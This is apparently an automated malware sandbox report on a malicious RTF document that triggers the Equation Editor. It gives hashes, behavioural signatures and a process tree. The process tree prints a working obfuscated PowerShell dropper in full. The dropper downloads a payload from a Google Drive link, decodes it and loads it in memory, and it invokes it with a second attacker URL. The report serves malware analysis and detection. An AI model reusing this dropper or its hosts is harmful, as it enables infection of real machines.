Analysis

  • max time kernel
    89s
  • max time network
    93s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    29-10-2024 13:32

General

  • Target

    seebestthingswithreadyforgoodthingstogetmebackwithnice________________verynicepeopleswithoofdthingsw.rtf

  • Size

    111KB

  • MD5

    b2daf885c5199ed93bfdafe0f3a33ae6

  • SHA1

    3d2dba1d76e2bfcae449113de1597d0c725b3421

  • SHA256

    e164bb4a190f79c58b836441a8f59bf3ead186f359fbac64b0e86e7e058c0efe

  • SHA512

    662cf497918cabc230d8f857826cf6ed67b58288bd1dd8f61c617fe41b0a9034acc957716aa6f4e860d5546652d158be9b0aaec231034a8dad5a533dcb8381e2

  • SSDEEP

    384:GSXY16lFxTu95qsyeYJZw9IHJkJhvO6CC9GBRKdEQj3Mh/xyc11wtSuQO7HBLOWk:hXc/XBoGGBgnj3Mh/71wtSuQULOWk

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seebestthingswithreadyforgoodthingstogetmebackwithnice________________verynicepeopleswithoofdthingsw.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2304
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2256
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1668
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicecreamburnwithgreattasteoffinegiftformygirls.vbs"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2772
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTaGVMTGlEWzFdKyRzSGVsTElkWzEzXSsnWCcpICggKCgnTlJhaW1hZ2VVcmwgPSBpc0dodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZScrJ3hwJysnb3J0PWQnKydvd24nKydsb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBpc0c7TlJhd2ViQ2wnKydpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkMnKydsaWVudDtOUmFpbWFnZUJ5dGVzID0gTlJhdycrJ2ViQ2xpZW50LkRvd25sb2FkRGF0YShOUmFpbWEnKydnZVVybCk7TlJhaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoTlJhaW1hZ2VCeScrJ3Rlcyk7TlJhcycrJ3RhcnRGbGFnID0gaXNHPDxCQVNFJysnNjRfU1RBUlQ+PmlzRztOUmFlbmRGbGEnKydnID0gaXNHPDxCQVNFNjRfRU5EPj5pc0c7TlJhc3RhcnRJbmRleCA9IE5SYWltYWdlVCcrJ2V4dC5JbmRleE9mKE5SYXN0YXJ0RmxhZyk7TlJhZW5kSW5kZXggPSBOUmFpbWFnZVRleHQuSW5kZXhPZihOUmFlbmRGbGEnKydnKTtOUmFzdGFydEluZGV4IC1nZSAwIC1hbmQgTlJhZW5kSW5kZXggLWd0IE4nKydSYXN0YXJ0SW5kZXg7TlJhc3RhcnRJbmRleCArJysnPSBOUmFzdGFydEZsYWcuTGVuZycrJ3RoO05SYWJhc2U2NExlbmd0aCA9IE5SYWVuZEluZGV4IC0gTicrJ1Jhc3RhcnRJbmRleDtOUmFiYXNlNjRDb21tYW5kICcrJz0gTlJhaW1hZ2VUZXh0LlN1YnN0cmluZyhOJysnUmFzdGFydEluZGV4LCBOUmEnKydiYXNlNjRMZW5ndGgpO05SYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKE5SYWInKydhc2U2NENvJysnbW1hbmQuVG9DaGFyQXJyYXkoKSBGN0kgRm9yRWFjaC1PYmplY3QgeyBOUmFfIH0pWy0xLi4tKE5SYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07TlJhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XScrJzo6RnJvbUJhc2U2NFN0cmluZyhOUmFiYXNlNjRSZXZlcnNlZCk7TlJhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE5SYWNvbW1hbmRCeXRlcyk7TlJhdmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZChpc0dWQUlpc0cpJysnO05SYXZhaScrJ01ldGhvZC5JbnZva2UoTlJhbicrJ3VsbCwgQChpc0d0eHQuJysnR0ZSRkZSRS82Ny8yMi4wNzEuOTgxLjgxLy8nKyc6cHR0aGlzRywgaXNHZGVzYXRpdmFkJysnb2lzRywgaXNHZGVzYXRpdmFkb2lzRywgJysnaXNHZGVzYXRpdmFkb2lzRywgaXNHQ2FzUG9saXNHLCBpc0dkZXNhdGl2YWRvaXNHLCBpc0dkZXNhdCcrJ2l2YWRvaXNHLGlzR2Rlc2F0aXZhZG9pc0cnKycsaXNHZGVzYXRpdmFkb2knKydzRyxpc0dkZXNhdGl2YWRvaXNHLGlzR2Rlc2F0aXZhZG9pc0csaXNHZGVzYXRpdmFkb2lzRyxpc0cxJysnaXNHJysnLCcrJ2lzR2Rlc2F0aXZhZG9pc0cpKTsnKSAgLUNyRXBsYUNFICAnTlJhJyxbQ0hhcl0zNi1yZVBsYUNFIChbQ0hhcl0xMDUrW0NIYXJdMTE1K1tDSGFyXTcxKSxbQ0hhcl0zOSAtcmVQbGFDRSAnRjdJJyxbQ0hhcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2800
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SheLLiD[1]+$sHelLId[13]+'X') ( (('NRaimageUrl = isGhttps://drive.google.com/uc?e'+'xp'+'ort=d'+'own'+'load&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur isG;NRawebCl'+'ient = New-Object System.Net.WebC'+'lient;NRaimageBytes = NRaw'+'ebClient.DownloadData(NRaima'+'geUrl);NRaimageText = [System.Text.Encoding]::UTF8.GetString(NRaimageBy'+'tes);NRas'+'tartFlag = isG<<BASE'+'64_START>>isG;NRaendFla'+'g = isG<<BASE64_END>>isG;NRastartIndex = NRaimageT'+'ext.IndexOf(NRastartFlag);NRaendIndex = NRaimageText.IndexOf(NRaendFla'+'g);NRastartIndex -ge 0 -and NRaendIndex -gt N'+'RastartIndex;NRastartIndex +'+'= NRastartFlag.Leng'+'th;NRabase64Length = NRaendIndex - N'+'RastartIndex;NRabase64Command '+'= NRaimageText.Substring(N'+'RastartIndex, NRa'+'base64Length);NRabase64Reversed = -join (NRab'+'ase64Co'+'mmand.ToCharArray() F7I ForEach-Object { NRa_ })[-1..-(NRabase64Command.Length)];NRacommandBytes = [System.Convert]'+'::FromBase64String(NRabase64Reversed);NRaloadedAssembly = [System.Reflection.Assembly]::Load(NRacommandBytes);NRavaiMethod = [dnlib.IO'+'.Home].GetMethod(isGVAIisG)'+';NRavai'+'Method.Invoke(NRan'+'ull, @(isGtxt.'+'GFRFFRE/67/22.071.981.81//'+':ptthisG, isGdesativad'+'oisG, isGdesativadoisG, '+'isGdesativadoisG, isGCasPolisG, isGdesativadoisG, isGdesat'+'ivadoisG,isGdesativadoisG'+',isGdesativadoi'+'sG,isGdesativadoisG,isGdesativadoisG,isGdesativadoisG,isG1'+'isG'+','+'isGdesativadoisG));') -CrEplaCE 'NRa',[CHar]36-rePlaCE ([CHar]105+[CHar]115+[CHar]71),[CHar]39 -rePlaCE 'F7I',[CHar]124))"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2836

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      1cd926de44be7a9618949c4c2cf8f8dc

      SHA1

      c325d15f085e54fddaa7cfd99f197b9d4d9129a1

      SHA256

      7b9a8058ad019d2147c917cef958d0ba1ba4c27a29b3d6abddcb125139df4eb2

      SHA512

      81b94b6ff04a689ac7ee970f04097f11539563acd220b6b919e67bade59c65884fa95bd535a3afa58efdc96b7083787da54885e746a273dec8f28f437a7bcceb

    • C:\Users\Admin\AppData\Roaming\nicecreamburnwithgreattasteoffinegiftformygirls.vbs

      Filesize

      136KB

      MD5

      3121047f2ec5d9702cce617a00d18a44

      SHA1

      33c1768ae204d9c2415091562e540924c10983fb

      SHA256

      8c56ecfb757303c59a2c6e41d5e1604c5237858289e9bb0714a92003e21b2e1c

      SHA512

      cacc597abfba36b26a1cf3d23749ccf477387d346ca1d14df8bce0c4ebe26d1881d66d413edf051308be1c749b9984ccc027a086104354cc97ad585d39243404

    • memory/2304-0-0x000000002FDF1000-0x000000002FDF2000-memory.dmp

      Filesize

      4KB

    • memory/2304-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2304-2-0x000000007104D000-0x0000000071058000-memory.dmp

      Filesize

      44KB

    • memory/2304-23-0x000000007104D000-0x0000000071058000-memory.dmp

      Filesize

      44KB